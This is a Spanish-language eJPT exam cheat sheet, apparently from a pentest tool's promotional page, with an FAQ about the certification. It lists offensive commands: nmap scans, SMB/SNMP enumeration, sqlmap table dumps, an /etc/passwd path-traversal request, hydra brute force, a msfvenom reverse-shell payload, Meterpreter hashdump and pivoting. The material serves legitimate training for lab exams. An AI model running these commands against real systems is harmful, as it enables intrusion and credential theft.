# Descubrimiento de hosts y Escaneo
El eJPT empieza por encontrar hosts vivos y puertos abiertos. Domina nmap — es la herramienta más importante del examen.
nmap -sn 10.10.10.0/24
nmap -p- --min-rate=1000 -T4 TARGET -oN ports.txt
nmap -p OPEN_PORTS -sC -sV TARGET
nmap -sU --top-ports 100 TARGET
# Enumeración
Responde a las preguntas del examen enumerando cada servicio. Usuarios, recursos, versiones y configuraciones: eso es lo que preguntan.
smbclient -N -L //TARGET ; enum4linux-ng -A TARGET
snmpwalk -v2c -c public TARGET
ftp TARGET # prueba anonymous / anonymous
gobuster dir -u http://TARGET -w /usr/share/wordlists/dirb/common.txt -x php,txt,html
# Ataques Web
El eJPT cubre las vulnerabilidades web básicas: inyección SQL, XSS y directory traversal. Burp Suite y sqlmap hacen el trabajo pesado.
sqlmap -u "http://TARGET/page.php?id=1" --batch --dbs
sqlmap -u "http://TARGET/page.php?id=1" --batch -D db -T users --dump
curl "http://TARGET/page?file=../../../../etc/passwd"
hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
# Explotación (Metasploit)
A diferencia de la OSCP, el eJPT fomenta Metasploit. Aprende el flujo de msfconsole — es tu principal herramienta de explotación.
search, define RHOSTS/LHOST, luego run.msfconsole -q ; search TYPE:exploit SERVICE
use exploit/MODULE ; set RHOSTS TARGET ; set LHOST YOUR_IP ; run
msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4444 -f exe -o shell.exe
use exploit/multi/handler ; set PAYLOAD windows/meterpreter/reverse_tcp ; run
# Post-Explotación y Pivoting
Una vez tengas una sesión Meterpreter, recopila información y pivota hacia las subredes internas — un escenario clásico del eJPT.
getuid ; sysinfo ; hashdump
run autoroute -s 192.168.1.0/24
use auxiliary/server/socks_proxy ; run # luego usa proxychains
proxychains4 nmap -sT -Pn -p 445,3389 192.168.1.10
# Consejos del Examen eJPT
Estrategia para el examen accesible y basado en preguntas.
❓ Preguntas frecuentes eJPT
El eJPT de INE es un examen 100% práctico y accesible para principiantes. Dispones de unas 48 horas en un laboratorio en vivo y respondes a un conjunto de preguntas de opción múltiple encontrando flags e información en la red objetivo. No hay informe escrito.
No. A diferencia de la OSCP, la CPTS o el PNPT, el eJPT no requiere un informe profesional. Es un examen dinámico basado en preguntas: explotas el laboratorio y respondes preguntas de opción múltiple. Una de las certificaciones prácticas más accesibles para principiantes.
Sí — el eJPT es ampliamente considerado la mejor certificación de pentest práctica de nivel inicial. Asume poca experiencia y se acompaña del curso Penetration Testing Student (PTS) de INE. Cubre los fundamentos: escaneo, enumeración, ataques web, Metasploit y pivoting básico.
Sí — Metasploit está totalmente permitido e incluso se fomenta. A diferencia de la OSCP (que lo limita a una máquina), el eJPT espera que uses Metasploit y Meterpreter para la explotación, el pivoting (autoroute/socks) y la post-explotación.
La mayoría de los candidatos necesitan de 1 a 3 meses. Completar la ruta Penetration Testing Student (PTS) de INE y practicar con máquinas principiantes de HackTheBox y TryHackMe basta para que la mayoría apruebe.
El eJPT se centra en los fundamentos de red y web e incluye pivoting básico (enrutar a través de un host comprometido para alcanzar una subred interna). No es un examen muy orientado a Active Directory como la CPTS o el PNPT.
Haz el eJPT primero. Es la certificación de nivel inicial que construye los fundamentos (escaneo, enumeración, explotación, pivoting básico) sin informe ni buffer overflow. La OSCP es un salto grande. eJPT → OSCP/CPTS es un recorrido común.
Sí. INE suele incluir un reintento gratuito con el voucher, y el examen está pensado para ser accesible a principiantes. Consulta la política actual de INE para los detalles exactos antes de programar.
nmap para el escaneo, gobuster/dirb y Burp Suite para web, sqlmap para inyección SQL, Metasploit/Meterpreter para explotación y pivoting, hydra para fuerza bruta, y herramientas básicas de enumeración (enum4linux, smbclient). Los fundamentos importan más que las herramientas avanzadas.
Sí — como acelerador de aprendizaje. El mapa mental gratuito organiza 12.020+ comandos por todos los dominios del eJPT (escaneo, enumeración, web, Metasploit, pivoting) con búsqueda instantánea, para que los principiantes encuentren rápido el comando correcto. Respeta siempre las reglas de tu examen.
📚 Recursos relacionados
- Cheatsheet Nmap — La herramienta n.º 1 del eJPT — referencia completa de escaneo
- Cheatsheet Metasploit — msfconsole, Meterpreter y pivoting — herramientas clave del eJPT
- Cheatsheet OSCP — Tu siguiente paso tras el eJPT — 150+ comandos de examen
- Cheatsheet Inyección SQL — Un ataque web clave del eJPT — payloads y sqlmap
- Cómo Empezar en Pentesting — Metodología principiante y ruta de aprendizaje para el eJPT
- Cheatsheet Pentesting completa — 200+ comandos para web, red, Active Directory y privesc
Prepara tu eJPT con 12.020+ comandos
Esta cheatsheet es solo la superficie. Pentest Mindmap organiza 12.020+ comandos en 34 categorías con búsqueda instantánea — perfecto para encontrar rápido el comando correcto durante tu preparación del eJPT.
Empezar gratis →